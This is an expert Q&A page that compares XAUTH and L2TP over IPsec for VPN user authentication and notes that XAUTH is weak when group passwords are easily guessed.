Most IPsec VPN products use one of two common alternatives to support user authentication: Extended Authentication...
(XAUTH) or the Layer Two Tunneling Protocol (L2TP) over IPsec.
- L2TP over IPsec is implemented by the native Microsoft VPN client in Windows 2000, XP, and 2003. Add-on L2TP over IPsec clients are also available for other most other operating systems. You'll also need a VPN gateway that supports L2TP over IPsec. In this approach, an IPsec connection is first established in transport mode. User authentication occurs using L2TP (UDP/1701), which is encrypted by sending it over the IPsec transport.
- XAUTH is implemented by most non-Microsoft VPN clients and VPN Remote Access Concentrators. XAUTH inserts a non-standard exchange in the middle of the IKE protocol, after peer authentication but before the IPsec tunnel is established. XAUTH is vulnerable when used with group passwords that are easily guessed -- to learn more, read this Cisco advisory or article by John Pliam. However, when XAUTH is combined with a strong group secret or certificate and two-factor user authentication, risk is much lower.
The IETF is now working on a new version of IKE that will provide native support for a variety of user authentication methods, including generic token cards. To learn more, see the latest IKEv2 Internet Draft.
Related Q&A from Lisa Phifer
The enterprise mobility management market for wearable devices is in its infancy, but IT can still use existing EMM tools to manage wearables.continue reading
Wireless expert Lisa A. Phifer explains to what extent WEP cracking remains a worrisome issue. It all depends on your company's WLAN security policy.continue reading
Wireless expert Lisa A. Phifer explains why you shouldn't stop using 802.1X authentication methods for enterprise WLAN access control.continue reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.